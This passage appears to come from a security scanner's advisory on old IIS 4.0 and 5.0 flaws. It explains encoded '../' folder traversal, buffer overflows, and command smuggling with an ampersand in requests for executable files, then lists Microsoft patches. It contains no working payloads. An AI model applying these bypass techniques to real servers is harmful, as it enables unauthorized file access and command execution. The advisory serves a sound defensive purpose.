Furthermore, IIS 4.0 servers are not affected by this vulnerability but are affected by a similar vulnerability. (See below.)

Folder Traversal in IIS 4.0 and 5.0

CVE 2000-0884
CVE 2001-0333

The "../" string in a pathname usually indicates a parent directory. IIS rejects URLs containing this string, thereby preventing web users from accessing files outside of the web document root directory. However, this safeguard can be averted by:

  1. Representing part of the ../ string in a Unicode format, or
  2. Using double encoding; that is, URL-encoding part of the ../ string, and then URL-encoding the resulting encoded string
Using either of these two exploits, it is possible for a remote user to bypass the safeguard and gain unauthorized access to any file or system command located on the same logical drive as the web root directory. The attacker would have the privileges of the IUSR_machinename account, where machinename is the name of the system. This account, if included in the Everyone and Users groups, could be used to execute almost any command on the system.

Buffer Overflows in IIS 4.0

CVE 1999-0874

In Microsoft IIS version 4.0, the DLL files which are executed when .HTR, .IDC, or .STM files are requested have a buffer overflow condition which could allow an attacker to crash the server or execute arbitrary commands on the web server.

This vulnerability could not be confirmed by a remote scan. The server is not vulnerable to this attack if any of the following conditions exist:

  • Windows NT 4.0 Service Pack 6 has been applied
  • The ext-fix hotfix has been applied
  • The workaround for this problem has been applied. That is, "check if this file exists" has been selected for each of the affected file types
  • The following three files do not exist on the server: ism.dll, ssinc.dll, and httpodbc.dll

If none of the above conditions exist, then the server is probably vulnerable.

CVE 2000-0226
An older buffer overflow affects IIS 4.0's implementation of chunked encoding and could allow an attacker to cause a denial of service with a large POST or PUT command.

Filename Inspection Vulnerability

CVE 2000-0886

When the web server receives a request for a .exe or .com file under an executable directory, the system calls cmd.exe to process the requested program. Anything following the filename in the request is interpreted as a command-line argument. Some arguments, such as an ampersand (&), could cause the remaining arguments to be interpreted as a new command. Thus, if an attacker knows the path and filename of a batch of .cmd file under an executable directory, he or she could run arbitrary commands by sending a specially crafted request for that file.

Similarly, script interpreters such as perl.exe and php.exe, could be tricked into running arbitrary commands by a specially crafted request for the corresponding type of file.

Other vulnerabilities in IIS 4 and 5

CVE 2000-0770
CVE 2001-0151
CVE 2001-0507
There are several other vulnerabilities in IIS 4 and 5 which are not as critical as those listed above, but which still should be addressed. The first could allow an attacker to gain additional privileges to a file in IIS 4.0 and 5.0 by sending a specially crafted URL if a parent directory has less restrictive permissions than the file. The second could allow an attacker to create a denial of service against IIS 5.0 by sending a malformed WebDAV request to the server. The third is a privilege elevation vulnerability which arises in IIS 5.0 because the table that specifies which files can be run in-process uses both absolute and relative path names, allowing a file which is not in the table to possibly match a file name in the table.

Resolutions

Install the patches referenced in Microsoft Security Bulletins 03-018, 06-034 (for Windows 2000), 08-006 (for Windows 2003 and XP), and 08-062.

For IIS 5.1, also install the patches referenced in 07-041. Note that the patch referenced in Microsoft Security Bulletin 02-050 must also be installed if client side certificates are to function.

IIS 4.0 users should also install the patch referenced in Microsoft Security Bulletin 04-021 or disable the permanent redirection option under the Home Directory tab in the web site properties.

Where can I read more ab